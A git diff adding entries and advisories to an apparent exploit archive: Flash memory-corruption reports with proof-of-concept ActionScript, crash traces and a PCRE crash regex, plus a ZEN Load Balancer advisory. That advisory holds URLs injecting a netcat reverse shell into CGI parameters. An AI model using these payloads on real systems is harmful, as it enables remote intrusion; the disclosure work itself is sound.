pythonmaster41
diff --git a/‎files.csv‎
Lines changed: 62 additions & 0 deletions b/‎files.csv‎
Lines changed: 62 additions & 0 deletions
diff --git a/‎platforms/cgi/webapps/37830.txt‎
Lines changed: 17 additions & 0 deletions b/‎platforms/cgi/webapps/37830.txt‎
Lines changed: 17 additions & 0 deletions
diff --git a/‎platforms/lin_amd64/dos/37876.txt‎
Lines changed: 40 additions & 0 deletions b/‎platforms/lin_amd64/dos/37876.txt‎
Lines changed: 40 additions & 0 deletions
diff --git a/‎platforms/lin_amd64/dos/37879.txt‎
Lines changed: 24 additions & 0 deletions b/‎platforms/lin_amd64/dos/37879.txt‎
Lines changed: 24 additions & 0 deletions
diff --git a/‎platforms/lin_amd64/dos/37880.txt‎
Lines changed: 24 additions & 0 deletions b/‎platforms/lin_amd64/dos/37880.txt‎
Lines changed: 24 additions & 0 deletions
diff --git a/‎platforms/linux/dos/37839.txt‎
Lines changed: 63 additions & 0 deletions b/‎platforms/linux/dos/37839.txt‎
Lines changed: 63 additions & 0 deletions
@@ -34037,6 +34037,7 @@ id,file,description,date,author,platform,type,port
 37706,platforms/linux/dos/37706.txt,"Libuser Library - Multiple Vulnerabilities",2015-07-27,"Qualys Corporation",linux,dos,0
 37737,platforms/windows/local/37737.rb,"Heroes of Might and Magic III .h3m Map file Buffer Overflow",2015-08-07,metasploit,windows,local,0
 37825,platforms/osx/local/37825.txt,"OS X 10.10.5 - XNU Local Privilege Escalation",2015-08-18,kpwn,osx,local,0
+37826,platforms/php/webapps/37826.txt,"WordPress Multiple Path Dislosure Vulnerabilities",2012-09-18,AkaStep,php,webapps,0
 37751,platforms/php/webapps/37751.txt,"WordPress WPTF Image Gallery 1.03 - Aribtrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80
 37752,platforms/php/webapps/37752.txt,"WordPress Recent Backups Plugin 0.7 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80
 37705,platforms/php/webapps/37705.txt,"WordPress Unite Gallery Lite Plugin 1.4.6 - Multiple Vulnerabilities",2015-07-27,"Nitin Venkatesh",php,webapps,80
@@ -34130,6 +34131,7 @@ id,file,description,date,author,platform,type,port
 37805,platforms/php/webapps/37805.txt,"TAGWORX.CMS 'cid' Parameter SQL Injection Vulnerability",2012-09-18,Crim3R,php,webapps,0
 37806,platforms/cgi/webapps/37806.txt,"AxisInternet VoIP Manager Multiple Cross Site Scripting Vulnerabilities",2012-09-18,"Benjamin Kunz Mejri",cgi,webapps,0
 37807,platforms/php/webapps/37807.txt,"VBulletin 4.1.12 'blog_plugin_useradmin.php' SQL Injection Vulnerability",2012-09-18,Am!r,php,webapps,0
+37808,platforms/windows/remote/37808.py,"Easy File Management Web Server 5.6 - USERID Remote Buffer Overflow",2015-08-18,"Tracy Turben",windows,remote,0
 37809,platforms/php/webapps/37809.php,"Nuts CMS Remote PHP Code Injection / Execution",2015-08-17,"Yakir Wizman",php,webapps,80
 37810,platforms/windows/dos/37810.txt,"FTP Commander 8.02 - SEH Overwrite",2015-08-18,"_ Un_N0n _",windows,dos,0
 37811,platforms/php/webapps/37811.py,"Magento CE < 1.9.0.1 Post Auth RCE",2015-08-18,Ebrietas0,php,webapps,80
@@ -34142,3 +34144,63 @@ id,file,description,date,author,platform,type,port
 37820,platforms/php/webapps/37820.txt,"CodoForum 3.3.1 - Multiple SQL Injection Vulnerabilities",2015-08-18,"Curesec Research Team",php,webapps,80
 37821,platforms/php/webapps/37821.txt,"BigTree CMS 4.2.3 - Authenticated SQL Injection Vulnerabilities",2015-08-18,"Curesec Research Team",php,webapps,80
 37822,platforms/php/webapps/37822.txt,"WordPress WP Symposium Plugin 15.1 - Blind SQL Injection",2015-08-18,dxw,php,webapps,80
+37827,platforms/php/webapps/37827.txt,"WordPress Purity Theme Multiple Cross Site Scripting Vulnerabilities",2012-09-07,"Matan Azugi",php,webapps,0
+37828,platforms/php/webapps/37828.txt,"Poweradmin 'index.php' Cross Site Scripting Vulnerability",2012-09-20,Siavash,php,webapps,0
+37829,platforms/php/webapps/37829.txt,"WordPress MF Gig Calendar Plugin Cross Site Scripting Vulnerability",2012-09-20,"Chris Cooper",php,webapps,0
+37830,platforms/cgi/webapps/37830.txt,"ZEN Load Balancer Multiple Security Vulnerabilities",2012-09-24,"Brendan Coles",cgi,webapps,0
+37833,platforms/php/webapps/37833.txt,"YCommerce Multiple SQL Injection Vulnerabilities",2012-09-21,"Ricardo Almeida",php,webapps,0
+37834,platforms/linux/remote/37834.py,"Samba 3.5.11/3.6.3 Unspecified Remote Code Execution Vulnerability",2012-09-24,kb,linux,remote,0
+37835,platforms/php/webapps/37835.html,"WordPress Cross Site Request Forgery Vulnerability",2012-09-22,AkaStep,php,webapps,0
+37836,platforms/php/webapps/37836.txt,"WordPress Token Manager Plugin 'tid' Parameter Cross Site Scripting Vulnerability",2012-09-25,TheCyberNuxbie,php,webapps,0
+37837,platforms/php/webapps/37837.html,"WordPress Sexy Add Template Plugin Cross Site Request Forgery Vulnerability",2012-09-22,the_cyber_nuxbie,php,webapps,0
+37838,platforms/php/webapps/37838.txt,"Neturf eCommerce Shopping Cart 'SearchFor' Parameter Cross Site Scripting Vulnerability",2011-12-30,farbodmahini,php,webapps,0
+37839,platforms/linux/dos/37839.txt,"Flash PCRE Regex Compilation Zero-Length Assertion Arbitrary Bytecode Execution",2015-08-19,"Google Security Research",linux,dos,0
+37840,platforms/windows/remote/37840.txt,"Flash Broker-Based Sandbox Escape via Forward Slash Instead of Backslash",2015-08-19,KeenTeam,windows,remote,0
+37841,platforms/windows/remote/37841.txt,"Flash Broker-Based Sandbox Escape via Unexpected Directory Lock",2015-08-19,KeenTeam,windows,remote,0
+37842,platforms/windows/remote/37842.txt,"Flash Broker-Based Sandbox Escape via Timing Attack Against File Moving",2015-08-19,KeenTeam,windows,remote,0
+37843,platforms/windows/dos/37843.txt,"Flash Player Integer Overflow in Function.apply",2015-08-19,"Google Security Research",windows,dos,0
+37844,platforms/windows/dos/37844.txt,"Flash AVSS.setSubscribedTags Use After Free Memory Corruption",2015-08-19,"Google Security Research",windows,dos,0
+37845,platforms/windows/dos/37845.txt,"Flash Uninitialized Stack Variable MPD Parsing Memory Corruption",2015-08-19,bilou,windows,dos,0
+37846,platforms/windows/dos/37846.txt,"Flash Issues in DefineBitsLossless and DefineBitsLossless2 Leads to Using Uninitialized Memory",2015-08-19,bilou,windows,dos,0
+37847,platforms/windows/dos/37847.txt,"Flash AS2 Use After Free in TextField.filters",2015-08-19,bilou,windows,dos,0
+37848,platforms/windows/dos/37848.txt,"Flash AS2 Use After Free While Setting TextField.filters",2015-08-19,bilou,windows,dos,0
+37849,platforms/windows/dos/37849.txt,"Flash Use-After-Free in Display List Handling",2015-08-19,KeenTeam,windows,dos,0
+37850,platforms/multiple/dos/37850.txt,"Flash Use-After-Free in NetConnection.connect",2015-08-19,"Google Security Research",multiple,dos,0
+37851,platforms/multiple/remote/37851.txt,"Flash Boundless Tunes - Universal SOP Bypass Through ActionSctipt's Sound Object",2015-08-19,"Google Security Research",multiple,remote,0
+37852,platforms/multiple/dos/37852.txt,"Adobe Flash Use-After-Free When Setting Variable",2015-08-19,"Google Security Research",multiple,dos,0
+37853,platforms/windows/dos/37853.txt,"Flash AS2 Use After Free in DisplacementMapFilter.mapBitmap",2015-08-19,"Google Security Research",windows,dos,0
+37854,platforms/windows/dos/37854.txt,"Flash Use-After-Free with MovieClip.scrollRect in AS2",2015-08-19,"Google Security Research",windows,dos,0
+37855,platforms/multiple/dos/37855.txt,"Adobe Flash Use-After-Free When Setting Value",2015-08-19,"Google Security Research",multiple,dos,0
+37856,platforms/windows/dos/37856.txt,"Adobe Flash Out-of-Bounds Memory Read While Parsing a Mutated SWF File",2015-08-19,"Google Security Research",windows,dos,0
+37857,platforms/windows/dos/37857.txt,"Adobe Flash Out-of-Bounds Memory Read While Parsing a Mutated SWF File (2)",2015-08-19,"Google Security Research",windows,dos,0
+37858,platforms/windows/dos/37858.txt,"Adobe Flash Out-of-Bounds Memory Read While Parsing a Mutated TTF File Embedded in SWF",2015-08-19,"Google Security Research",windows,dos,0
+37859,platforms/multiple/dos/37859.txt,"Adobe Flash Use-After-Free in XML.childNodes",2015-08-19,"Google Security Research",multiple,dos,0
+37860,platforms/windows/dos/37860.txt,"Flash Use-After-Free with Color.setRGB in AS2",2015-08-19,bilou,windows,dos,0
+37861,platforms/windows/dos/37861.txt,"Flash AS2 Use-After-Free in DisplacementMapFilter.mapBitmap (2)",2015-08-19,bilou,windows,dos,0
+37862,platforms/windows/dos/37862.txt,"Adobe Flash Out-of-Bounds Read in UTF Conversion",2015-08-19,"Google Security Research",windows,dos,0
+37863,platforms/multiple/dos/37863.txt,"Adobe Flash Use-After-Free in scale9Grid",2015-08-19,"Google Security Research",multiple,dos,0
+37864,platforms/multiple/dos/37864.txt,"Adobe Flash Use-After-Free in Drawing Methods _this_",2015-08-19,"Google Security Research",multiple,dos,0
+37865,platforms/multiple/dos/37865.txt,"Adobe Flash Use-After-Free in attachMovie",2015-08-19,"Google Security Research",multiple,dos,0
+37866,platforms/linux/dos/37866.txt,"Adobe Flash Pointer Crash in Drawing and Bitmap Handling",2015-08-19,"Google Security Research",linux,dos,0
+37867,platforms/linux/dos/37867.txt,"Adobe Flash Pointer Crash After Continuing Slow Script",2015-08-19,"Google Security Research",linux,dos,0
+37868,platforms/linux/dos/37868.txt,"Adobe Flash Bad Dereference at 0x23c on Linux x64",2015-08-19,"Google Security Research",linux,dos,0
+37869,platforms/linux/dos/37869.txt,"Adobe Flash Pointer Crash in Button Handling",2015-08-19,"Google Security Research",linux,dos,0
+37870,platforms/linux/dos/37870.txt,"Adobe Flash Pointer Crash in XML Handling",2015-08-19,"Google Security Research",linux,dos,0
+37871,platforms/multiple/dos/37871.txt,"Adobe Flash Use-After-Free in swapDepths",2015-08-19,"Google Security Research",multiple,dos,0
+37872,platforms/multiple/dos/37872.txt,"Adobe Flash Bad Write in XML When Callback Modifies XML Tree During Property Delete",2015-08-19,"Google Security Research",multiple,dos,0
+37873,platforms/multiple/dos/37873.txt,"Adobe Flash Use-After-Free in createTextField",2015-08-19,"Google Security Research",multiple,dos,0
+37874,platforms/multiple/dos/37874.txt,"Adobe Flash Type Confusion in TextRenderer.setAdvancedAntialiasingTable",2015-08-19,"Google Security Research",multiple,dos,0
+37875,platforms/windows/dos/37875.txt,"Adobe Flash URL Resource Use-After-Free",2015-08-19,"Google Security Research",windows,dos,0
+37876,platforms/lin_amd64/dos/37876.txt,"Adobe Flash XMLSocket Destructor Not Cleared Before Setting User Data in connect",2015-08-19,"Google Security Research",lin_amd64,dos,0
+37877,platforms/multiple/dos/37877.txt,"Adobe Flash Use-After-Free in TextField.gridFitType",2015-08-19,"Google Security Research",multiple,dos,0
+37878,platforms/multiple/dos/37878.txt,"Adobe Flash: FileReference Class Type Confusion",2015-08-19,"Google Security Research",multiple,dos,0
+37879,platforms/lin_amd64/dos/37879.txt,"Adobe Flash Heap-Based Buffer Overflow Loading FLV File with Nellymoser Audio Codec",2015-08-19,"Google Security Research",lin_amd64,dos,0
+37880,platforms/lin_amd64/dos/37880.txt,"Adobe Flash Heap-Based Buffer Overflow Due to Indexing Error When Loading FLV File",2015-08-19,"Google Security Research",lin_amd64,dos,0
+37881,platforms/win32/dos/37881.txt,"Adobe Flash Shared Object Type Confusion",2015-08-19,"Google Security Research",win32,dos,0
+37882,platforms/multiple/dos/37882.txt,"Adobe Flash Overflow in ID3 Tag Parsing",2015-08-19,"Google Security Research",multiple,dos,0
+37883,platforms/windows/dos/37883.txt,"Adobe Flash AS2 Use-After-Free in TextField.filters",2015-08-19,bilou,windows,dos,0
+37884,platforms/windows/dos/37884.txt,"Adobe Flash Heap Use-After-Free in SurfaceFilterList::CreateFromScriptAtom",2015-08-19,bilou,windows,dos,0
+37885,platforms/php/webapps/37885.html,"up.time 7.5.0 Superadmin Privilege Escalation Exploit",2015-08-19,LiquidWorm,php,webapps,9999
+37886,platforms/php/webapps/37886.txt,"up.time 7.5.0 XSS And CSRF Add Admin Exploit",2015-08-19,LiquidWorm,php,webapps,9999
+37887,platforms/php/webapps/37887.txt,"up.time 7.5.0 Arbitrary File Disclose And Delete Exploit",2015-08-19,LiquidWorm,php,webapps,9999
+37888,platforms/php/webapps/37888.txt,"up.time 7.5.0 Upload And Execute File Exploit",2015-08-19,LiquidWorm,php,webapps,9999
@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/55638/info
+
+ZEN Load Balancer is prone to the following security vulnerabilities:
+
+1. Multiple arbitrary command-execution vulnerabilities
+2. Multiple information-disclosure vulnerabilities
+3. An arbitrary file-upload vulnerability
+
+An attacker can exploit these issues to execute arbitrary commands, upload arbitrary files to the affected computer, or disclose sensitive-information.
+
+ZEN Load Balancer 2.0 and 3.0 rc1 are vulnerable. 
+
+http://www.example.com/index.cgi?id=2-2&filelog=%26nc+192.168.1.1+4444+-e+/bin/bash;&nlines=1&action=See+logs
+http://www.example.com/index.cgi?id=2-2&filelog=#&nlines=1%26nc+192.168.1.1+4444+-e+/bin/bash;&action=See+logs
+http://www.example.com/index.cgi?id=3-2&if=lo%26nc+192.168.1.1+4444+-e+/bin/bash%26&status=up&newip=0.0.0.0&netmask=255.255.255.0&gwaddr=&action=Save+%26+Up!
+http://www.example.com/config/global.conf
+http://www.example.com/backup/ 
@@ -0,0 +1,40 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=416&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
+
+This issue is a variant of  issue 192 , which the fix did not address.
+
+If XMLSocket connect is called on an object that already has a destroy function set, such as a BitmapData object, the method will set the user data of that object, but not clear the destroy function. This leads to type confusion when the user data is freed during garbage collection.
+
+A PoC is as follows:
+
+class subsocket extends flash.display.BitmapData{
+	
+
+	public function subsocket(){
+			
+	var n = {valueOf : func};
+    this.valueOf = func;
+	var x = new XMLSocket();
+
+	x.connect.call(this, "127.0.0.1", this);
+
+}
+
+function func(){
+
+	if(this){
+		}
+	this.__proto__ = {}; 
+	this.__proto__.__constructor__ = flash.display.BitmapData;
+	super(10, 10, true, 10);
+	return 80;
+	}
+		
+		
+}
+	
+
+A SWF and fla are attached. Note that this PoC needs to be run on a webserver on localhost (or change the IP in the PoC to the server value), and it only crashes in Chrome on 64-bit Linux.
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37876.zip
+
@@ -0,0 +1,24 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=425&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
+
+To reproduce, host the attached files appropriately and:
+
+http://localhost/LoadMP4.swf?file=crash4000368.flv
+
+If there is no crash at first, refresh the page a few times.
+
+With a debugger attached to 64-bit Flash in Chrome Linux, the crash manifests like this:
+
+=> 0x00007f7789d081bb <__memmove_ssse3_back+443>:	movaps %xmm1,-0x10(%rdi)
+
+rdi            0x7f7778d69200
+
+7f777894b000-7f7778d69000 rw-p 00000000 00:00 0 
+7f7778d69000-7f7778d88000 ---p 00000000 00:00 0 
+
+This looks very like a heap-based buffer overflow that just happens to have walked off the end of the committed heap.
+
+Also, this bug bears disturbing similarities to CVE-2015-3043, see for example: https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37879.zip
+
@@ -0,0 +1,24 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=426&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
+
+To reproduce, host the attached files appropriately, and:
+
+http://localhost/LoadMP4.swf?file=crash3006694.flv
+
+If there is no crash at first, refresh the page a few times.
+
+With a debugger attached to 64-bit Flash in Chrome Linux, the crash manifests like this:
+
+=> 0x00007f7779846eee:	mov    %ax,(%rdi,%rdx,2)
+
+rax            0xff69
+rdi            0x7f7778b70000
+rdx            0x160b
+
+7f777861e000-7f7778b72000 rw-p 00000000 00:00 0 
+7f7778b72000-7f7779228000 ---p 00000000 00:00 0 
+
+It looks like an indexing error; the rdi "base" address is in bounds but add on 2*rdx and the address is not in bounds.
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37880.zip
+
@@ -0,0 +1,63 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=224&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
+
+There’s an error in the PCRE engine version used in Flash that allows the execution of arbitrary PCRE bytecode, with potential for memory corruption and RCE.
+
+This issue is a duplicate of http://bugs.exim.org/show_bug.cgi?id=1546 originally reported to PCRE upstream by mikispag; I rediscovered the issue fuzzing Flash so have filed this bug report to track disclosure deadline for Adobe.
+
+The issue occurs in the handling of zero-length assertions; ie assertions where the object of the assertion is prepended with the OP_BRAZERO operator.
+
+Simplest testcase that will crash in an ASAN build is the following:
+
+(?(?<a>)?)
+
+This is pretty much a nonsense expression, and I'm not sure why it compiles successfully; but it corresponds to the statement that 'assert that named group 'a' optionally matches'; which is tautologically true regardless of 'a'.
+
+Regardless, we emit the following bytecode:
+
+0000 5d0012      93 BRA              [18]
+0003 5f000c      95 COND             [12]
+0006 66         102 BRAZERO          
+0007 5e00050001  94 CBRA             [5, 1]
+000c 540005      84 KET              [5]
+000f 54000c      84 KET              [12]
+0012 540012      84 KET              [18]
+0015 00           0 END        
+
+When this is executed, we reach the following code:
+
+/* The condition is an assertion. Call match() to evaluate it - setting
+the final argument match_condassert causes it to stop at the end of an
+assertion. */
+
+else
+  {
+  RMATCH(eptr, ecode + 1 + LINK_SIZE, offset_top, md, ims, NULL,
+      match_condassert, RM3);
+  if (rrc == MATCH_MATCH)
+    {
+    condition = TRUE;
+    ecode += 1 + LINK_SIZE + GET(ecode, LINK_SIZE + 2);
+    while (*ecode == OP_ALT) ecode += GET(ecode, 1);      <---- ecode is out of bounds at this point.
+
+If we look at the execution trace for this expression, we can see where this code goes wrong:
+
+exec 0x600e0000dfe4 93 [0x60040000dfd0 41]
+exec 0x600e0000dfe7 95 [0x60040000dfd0 41]
+exec 0x600e0000dfea 102 [0x60040000dfd0 41] <--- RMATCH recursive match
+exec 0x600e0000dfeb 94 [0x60040000dfd0 41]
+exec 0x600e0000dff0 84 [0x60040000dfd0 41]
+exec 0x600e0000dff3 84 [0x60040000dfd0 41]
+exec 0x600e0000dff6 84 [0x60040000dfd0 41]
+exec 0x600e0000dff9 0 [0x60040000dfd0 41]   <--- recursive match returns
+before 0x600e0000dfe7 24067                 <--- ecode == 0x...dfe7
+after 0x600e00013dea
+
+If we look at the start base for our regex, it was based at dfe4; so dfe7 is the OP_COND, as expected. Looking at the next block of code, we're clearly expecting the assertion to be followed by a group; likely OP_CBRA or another opcode that has a 16-bit length field following the opcode byte.
+
+ecode += 1 + LINK_SIZE + GET(ecode, LINK_SIZE + 2);
+
+In this case, the insertion of the OP_BRAZERO has resulted in the expected OP_CBRA being shifted forward by a byte to 0x...dfeb; and this GET results in the value of 0x5e00 + 1 + LINK_SIZE being added to the ecode pointer, instead of the correct 0x0005 + 1 + LINK_SIZE, resulting in bytecode execution hopping outside of the allocated heap buffer.
+
+See attached for a crash PoC for the latest Chrome/Flash on x64 linux.
+
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37839.zip